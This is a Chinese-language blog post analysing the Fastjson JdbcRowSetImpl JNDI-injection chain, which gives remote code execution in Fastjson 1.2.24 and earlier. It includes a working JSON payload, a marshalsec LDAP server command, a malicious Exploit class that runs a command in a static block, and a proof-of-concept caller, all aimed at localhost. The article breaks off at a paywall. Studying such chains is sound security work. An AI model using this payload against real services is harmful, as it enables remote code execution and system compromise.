JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 链分析

最新推荐文章于 2024-05-04 14:10:48 发布
最新推荐文章于 2024-05-04 14:10:48 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: JAVA 文章标签: java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57227221/article/details/116938686
版权

Java安全之FastJson JdbcRowSetImpl 链分析
0x00 前言
这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl 的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。

0x01 漏洞分析

利用限制
首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。

RMI利用的JDK版本≤ JDK 6u132、7u122、8u113

LADP利用JDK版本≤ 6u211 、7u201、8u191
在这里插入图片描述
攻击流程

1.首先是这个lookup(URI)参数可控
2.攻击者控制URI参数为指定为恶意的一个RMI服务
3.攻击者RMI服务器向目标返回一个Reference对象,Reference对象中指定某个精心构造的Factory类;
4.目标在进行 lookup() 操作时,会动态加载并实例化Factory类,接着调用 factory.getObjectInstance() 获取外部远程对象实例;
5.攻击者可以在Factory类文件的静态代码块处写入恶意代码,达到RCE的效果;

JDNI注入细节

简单分析一下lookup参数可控后,如何走到RCE.

调用链:

  • -> RegistryContext.decodeObject()
  • -> NamingManager.getObjectInstance()
  • -> factory.getObjectInstance()
  • -> NamingManager.getObjectFactoryFromReference()
  • -> helper.loadClass(factoryName);
    在这里插入图片描述
    loadclass进行实例化,触发静态代码块的Runtime代码执行命令执行。
    在这里插入图片描述
    在这里插入图片描述
    调试分析

影响版本:fastjson <= 1.2.24

payload:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:1389/Exploit", "autoCommit":true}

从前文的TemplatesImpl链分析中得知FastJson在反序列化时会去调用get、set、is方法。

  • @type: 目标反序列化类名;
  • dataSourceName: RMI注册中心绑定恶意服务;
  • autoCommit :在Fastjson JdbcRowSetImpl链中反序列化时,会去调用setAutoCommit方法。

详细分析fastjson如何解析可查看 Fastjson TemplatesImpl链分析 文章,再次不做赘诉。

启动LDAP服务端

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:80/#Exploit 1389

Exploit代码,需将代码编译成class文件然后挂在到web中

import java.io.IOException;

public class Exploit {
    public Exploit() {
    }
    static {
        try {
           
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

POC代码:

package com.nice0e3;

import com.alibaba.fastjson.JSON;

public class POC {
    public static void main(String[] args) {
//               String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/refObj\", \"autoCommit\":true}";
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\", \"autoCommit\":true}";
        JSON.parse(PoC);
    }

}

在这里插入图片描述看到payload中的 dataSourceName 参数在解析时候则会调用 setDataSourceName 对 DataSourceNamece 变量进行赋值,来看到代码

最低0.47元/天 解锁文章
Python炭烧
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl
Love&Share
02-26 5095
文章目录Fastjson 反序列化Fastjson 组件使用案例漏洞原理Jndi注入利用JdbcRowSetImpl链原理复现调试高级利用-推荐阅读Fastjson姿势技巧fastjson检测参考文章 Fastjson 反序列化 Fastjson 组件是阿里巴巴开发的反序列化与序列化组件 Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因: Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化类名 Fastj.
java 反显_java反序列化的恶意类回显实验
weixin_33102135的博客
03-07 470
//希望自己能持续的坚持学java因为看书学java有点枯燥,虽然我没搞清楚状况,但是还是希望做个实验。以下是实验记录。前提条件准备一个 漏洞环境,比如vulhub里的fastjson开始实验vulhub 里的readme里的payload类似以下{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{...
JAVA 最全最细的fastjson使用介绍,带你透彻领悟JSON
最新发布
2301_82242204的博客
05-04 654
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数Java工程师,想要提升技能,往往是自己摸索成长,自己不成体系的自学效果低效漫长且无助。因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3016
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
1.2.24 Fastjson反序列化TemplatesImplJdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2153
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
fastjson反序列化JdbcRowSetImpl
weixin_30596735的博客
12-28 394
Gadget com.sun.rowset.JdbcRowSetImpl setAutoCommit() -> connect() -> InitialContext.lookup() poc如下,dataSourceName 为rmi://localhost:1090/evil: String payload = "{\"@type\":\"Lcom.s...
FastJson.java
09-04
com.alibaba.fastjson.JSON读写json
Java FastJson使用教程
10-14
Java FastJson是一个高性能的JSON库,由阿里巴巴开发,它的主要功能是将Java对象转换为JSON格式,反之亦然。FastJson的设计目标是速度和效率,它在服务器端和Android客户端都表现出良好的性能。 FastJson提供了多种...
Java的JSON处理器fastjson使用方法详解
10-21
下面将详细介绍如何在Java中使用Fastjson进行JSON的解析与生成。 首先,让我们了解Fastjson的主要特点: 1. **快速**:Fastjson的解析和生成速度非常快,相比其他基于Java的JSON库,如Jackson,它具有显著的性能...
java JSON解析库Alibaba Fastjson用法详解
10-15
主要介绍了java JSON解析库Alibaba Fastjson用法,结合实例形式详细分析了java JSON解析库Alibaba Fastjson的基本功能、原理、用法及操作注意事项,需要的朋友可以参考下
JavaFastJson的基本使用
10-19
fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。下面通过本文给大家介绍JavaFastJson的基本使用,需要的朋友参考下吧
JDBC操作
qq_37051166的博客
07-31 418
JDBC操作目录JDBC驱动连接数据库读取资源文件配置数据库连接数据库ResultSetMetaData对象显示页面JDBC中的Statement的execute()方法JDBC增删改查Statement.executeQuery() 查询随机查询,使用游标随意移动查询,开启更新数据库Statement.executeUpdate()用结果集更新数据库,要开启结果集更新和移动到插入行缓冲结果集:C...
JDK中关于CachedRowSetImpl对象使用注意事项说明
m0_37961566的博客
11-26 1683
CachedRowSetImpl对象说明 全称:    com.sun.rowset.CachedRowSetImpl 父类:    javax.sql.rowset.BaseRowSet 实现的接口: javax.sql.RowSet        javax.sql.RowSetInternal        java.io.Serializable        java.lang.Clon...
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl
m0_64685672的博客
02-03 2783
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
Apache Dubbo反序列化漏洞
蚁景网安学院
11-18 1476
Apache Dubbo反序列化漏洞复现及利用!
JDK 1.5学习之RowSet
代码人生
03-19 1198
在jdk1.4的javax.sql包中有一个RowSet接口,但是没有具体实现的类。"Tiger"诞生之后,引入了  javax.sql.rowset包中的五个子接口和com.sun.rowset包里面的对应的五个实现类,这样我们就可是使用功能强大的 RowSet 了。jdk1.5中RowSet的五个子接口分别是JdbcRowSet,CachedRowSet,WebRowSet, JoinRowS
深入理解JNDI注入与Java反序列化漏洞利用
热门推荐
3569
08-04 1万+
rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路 [承上启下]----------------------------------上边属于我自己瞎扯的,下边是kingx大佬写的---------------------------------[承上启下] 在Java反序列化漏洞挖掘或利用的时候经常会遇到RMI、JNDI、JRM...
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3629
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
追洞小组 | fastjson1.2.24复现+分析
Ms08067安全实验室
03-05 2756
网络安全知识小百科,就点上方蓝字关注我们文章来源|MS08067 WEB攻防知识星球本文作者:爱吃芝士的小葵(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组1、靶场搭建2、...
java fastjson
09-16
FastJson是一种用于将Java对象转换为JSON格式的工具。它具有以下特点:可以将Java bean序列化为JSON字符串,也可以将JSON字符串反序列化为Java bean;操作JSON的速度非常快;不依赖于其他包;使用相对方便。 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值